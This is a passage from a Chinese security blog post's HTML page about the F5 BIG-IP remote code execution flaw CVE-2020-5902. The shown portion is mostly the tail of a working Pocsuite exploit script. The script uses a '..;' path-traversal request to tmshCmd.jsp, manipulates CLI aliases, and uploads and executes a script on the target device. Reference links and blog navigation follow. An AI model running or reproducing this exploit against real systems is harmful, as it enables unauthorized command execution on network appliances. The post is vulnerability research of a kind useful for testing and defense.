(req.text)</span><br><span class="line">                    logger.info(<span class="string">"[+] Execute OK, Having a check ..."</span>)</span><br><span class="line">                    <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">def</span> <span class="title">delete_alias</span><span class="params">()</span>:</span></span><br><span class="line">            payload = <span class="string">"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp"</span></span><br><span class="line">            headers = &#123;<span class="string">"User-Agent"</span>: <span class="string">"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0"</span>, <span class="string">"Accept"</span>: <span class="string">"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"</span>, <span class="string">"Accept-Language"</span>: <span class="string">"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2"</span>, <span class="string">"Connection"</span>: <span class="string">"close"</span>, <span class="string">"Upgrade-Insecure-Requests"</span>: <span class="string">"1"</span>, <span class="string">"Content-Type"</span>: <span class="string">"application/x-www-form-urlencoded"</span>&#125;</span><br><span class="line">            data=&#123;<span class="string">"command"</span>: <span class="string">"delete cli alias private list"</span>&#125;</span><br><span class="line">            req = requests.post(url+payload, headers=headers, data=data)</span><br><span class="line">            <span class="keyword">if</span> req.json()[<span class="string">'error'</span>] == <span class="string">""</span>:</span><br><span class="line">                <span class="keyword">return</span> <span class="literal">True</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            delete_alias()  <span class="comment"># 可能被别人别名了，第一步先尝试删除别名不然可能报错！！！</span></span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> create_alias():</span><br><span class="line">                <span class="keyword">if</span> upload_script(fileName,cmd):</span><br><span class="line">                    <span class="keyword">if</span> upload_check(fileName,cmd):</span><br><span class="line">                        <span class="keyword">if</span> execute_script(fileName):</span><br><span class="line">                            <span class="keyword">if</span> delete_alias():</span><br><span class="line">                                result[<span class="string">'VerifyInfo'</span>] = &#123;&#125;</span><br><span class="line">                                result[<span class="string">'VerifyInfo'</span>][<span class="string">'URL'</span>] = url</span><br><span class="line">                                result[<span class="string">'VerifyInfo'</span>][<span class="string">'Port'</span>] = str(port)</span><br><span class="line">                                <span class="keyword">return</span> self.parse_output(result)</span><br><span class="line">        <span class="keyword">except</span> Exception <span class="keyword">as</span> ex:</span><br><span class="line">            logger.error(ex)</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">_attack</span><span class="params">(self)</span>:</span></span><br><span class="line">        self._verify()</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">parse_url</span><span class="params">(self,url)</span>:</span></span><br><span class="line">        urparse = urlparse(url)</span><br><span class="line">        host = urparse.hostname</span><br><span class="line">        protocol = urparse.scheme</span><br><span class="line">        port = urparse.port <span class="keyword">if</span> urparse.port <span class="keyword">else</span> <span class="number">443</span> <span class="keyword">if</span> <span class="string">'https'</span> <span class="keyword">in</span> protocol <span class="keyword">else</span> <span class="number">80</span></span><br><span class="line">        path = urparse.path.rstrip(<span class="string">'/'</span>) <span class="keyword">if</span> urparse.path != <span class="string">''</span> <span class="keyword">else</span> <span class="string">''</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> protocol,host,port,path</span><br><span class="line"></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">parse_output</span><span class="params">(self, result)</span>:</span></span><br><span class="line">        output = Output(self)</span><br><span class="line">        <span class="keyword">if</span> result:</span><br><span class="line">            output.success(result)</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            output.fail(<span class="string">'target is not vulnerable'</span>)</span><br><span class="line">        <span class="keyword">return</span> output</span><br><span class="line"></span><br><span class="line">register_poc(DemoPOC)</span><br></pre></td></tr></table></figure>

<h4 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h4><blockquote>
<p><a href="http://www.r4v3zn.com/spear-framework/#/big-ip/cve-2020-5902?id=影响版本" target="_blank" rel="noopener">http://www.r4v3zn.com/spear-framework/#/big-ip/cve-2020-5902?id=%e5%bd%b1%e5%93%8d%e7%89%88%e6%9c%ac</a></p>
</blockquote>
<blockquote>
<p><a href="https://github.com/jas502n/CVE-2020-5902/" target="_blank" rel="noopener">https://github.com/jas502n/CVE-2020-5902/</a></p>
</blockquote>
<blockquote>
<p><a href="https://cert.360.cn/warning/detail?id=a1768348bde7807647cbc7232edce7df" target="_blank" rel="noopener">https://cert.360.cn/warning/detail?id=a1768348bde7807647cbc7232edce7df</a></p>
</blockquote>

      
    </div>
    
    
    

    <div>
    
        
    
    </div>

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/07/07/微信小程序RE/" rel="next" title="微信小程序RE">
                <i class="fa fa-chevron-left"></i> 微信小程序RE
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/07/16/常见端口问题/" rel="prev" title="常见端口问题">
                常见端口问题 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">laker</p>
              <p class="site-description motion-element" itemprop="description">有幸，欢迎</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">41</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">6</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://blog.th3wind.xyz" title="th3wind" target="_blank">th3wind</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://damit5.com/" title="damit5" target="_blank">damit5</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#F5-BIG-IP远程代码执行（CVE-2020-5902）"><span class="nav-number">1.</span> <span class="nav-text">F5 BIG-IP远程代码执行（CVE-2020-5902）</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#简介"><span class="nav-number">2.</span> <span class="nav-text">简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#影响版本"><span class="nav-number">3.</span> <span class="nav-text">影响版本</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#漏洞简析"><span class="nav-number">4.</span> <span class="nav-text">漏洞简析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#复现过程"><span class="nav-number">5.</span> <span class="nav-text">复现过程</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#痕迹分析"><span class="nav-number">6.</span> <span class="nav-text">痕迹分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#影响范围"><span class="nav-number">7.</span> <span class="nav-text">影响范围</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#防护方案"><span class="nav-number">8.</span> <span class="nav-text">防护方案</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#POC-基于Pocsuite"><span class="nav-number">9.</span> <span class="nav-text">POC(基于Pocsuite)</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#参考链接"><span class="nav-number">10.</span> <span class="nav-text">参考链接</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">laker</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



    <br>
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
    <span class="post-meta-divider">|</span>
    <span id="busuanzi_container_site_uv">本站访客数<span id="busuanzi_value_site_uv"></span>人</span>


        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
